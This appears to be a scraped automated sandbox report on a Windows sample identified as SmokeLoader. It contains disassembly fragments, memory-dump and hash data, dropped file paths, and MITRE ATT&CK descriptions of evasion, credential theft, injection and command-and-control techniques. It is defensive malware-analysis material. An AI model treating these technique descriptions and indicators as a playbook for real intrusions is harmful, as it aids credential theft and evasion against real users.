Part of subcall function 00C684A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C68265,?,00000000,?,?), ref: 00C684BF

#10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268
#9.WSOCK32(00000000,?,00000000), ref: 00C682A5

Strings

255.255.255.255, xrefs: 00C68280

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: 255.255.255.255
API String ID: 626452242-2422070025
Opcode ID: e9061f9d95357652b4956b367f87c97d7ea16bc63224e34abb7f3fd54927b1d8
Instruction ID: 0c9ece1815ef5adabadeae3e4f20d44838e95d538c17c75d23afa2aa226e444a
Opcode Fuzzy Hash: e9061f9d95357652b4956b367f87c97d7ea16bc63224e34abb7f3fd54927b1d8
Instruction Fuzzy Hash: 3F110871200205ABDB20EF54CC96FBDB364FF00724F204616F921972D1DB31A908DB91

Function 014D87BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 014028A0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,01526000,-000000FC,?,01424558,80070057,?,-000000FC,?), ref: 014028A5
Part of subcall function 014028A0: GetLastError.KERNEL32(?,00000000,00000000,?,01526000,-000000FC,?,01424558,80070057,?,-000000FC,?), ref: 014028AF

IsDebuggerPresent.KERNEL32(?,?,?,0140195C), ref: 014D87F1
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0140195C), ref: 014D8800

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 014D87FB

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: a46662e0840fbfe11a6044efab9eb96cc9326308c6e78f8637ce5b60155badc9
Instruction ID: ea163566dba174b3771ee5c8fb69bfcede626f76c09062a79222dcfc660bac3f
Opcode Fuzzy Hash: a46662e0840fbfe11a6044efab9eb96cc9326308c6e78f8637ce5b60155badc9
Instruction Fuzzy Hash: 28E092742007428FE772DF66E4197167BE0BF18744F00892EF892CB390EBB4E0488BA1

Function 00C48675 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C48683

Part of subcall function 00C134BA: _doexit.LIBCMT ref: 00C134C4

Strings

Error allocating memory., xrefs: 00C4867C
AutoIt, xrefs: 00C48677

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: fe6145d27cdce78b0159fa6fa2fc5bf505335f2e85eed323e94bd1ccfec84a88
Instruction ID: 37da0ac84e144601766102eae50dc5a431a69d3b98b317d7ba9b2fe4c4728698
Opcode Fuzzy Hash: fe6145d27cdce78b0159fa6fa2fc5bf505335f2e85eed323e94bd1ccfec84a88
Instruction Fuzzy Hash: 58D05B3138535C36E25536D4EC0BFCE7E485F06B56F200426BF04951C34DD985D5A2D9

Function 00C30181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C2FFC1

Part of subcall function 00C6C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,00C301AA,?), ref: 00C6C4AF
Part of subcall function 00C6C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C4C1

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C301B9

Strings

WIN_XPe, xrefs: 00C2FFD4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: f0fc15451ab7d76cdd61d629ffe2188ddc607d368634428b1e282e06e8ff5277
Instruction ID: 6df66e131b5d97984605272dcc496b1ca5096e3f6cc82cd82e3845ae042f0d57
Opcode Fuzzy Hash: f0fc15451ab7d76cdd61d629ffe2188ddc607d368634428b1e282e06e8ff5277
Instruction Fuzzy Hash: 48F0C97180512DDFDB55DB91DAA8BFCBBF8AB09340F2400AAE142B2591CB719F45DF20

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\78801\B

C:\Users\user\AppData\Local\Temp\78801\Later.pif

C:\Users\user\AppData\Local\Temp\9CFE.exe

C:\Users\user\AppData\Local\Temp\Alto

C:\Users\user\AppData\Local\Temp\Armenia

C:\Users\user\AppData\Local\Temp\Arnold

C:\Users\user\AppData\Local\Temp\Aw

C:\Users\user\AppData\Local\Temp\Bd

C:\Users\user\AppData\Local\Temp\Beastiality

C:\Users\user\AppData\Local\Temp\Beastiality.cmd

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre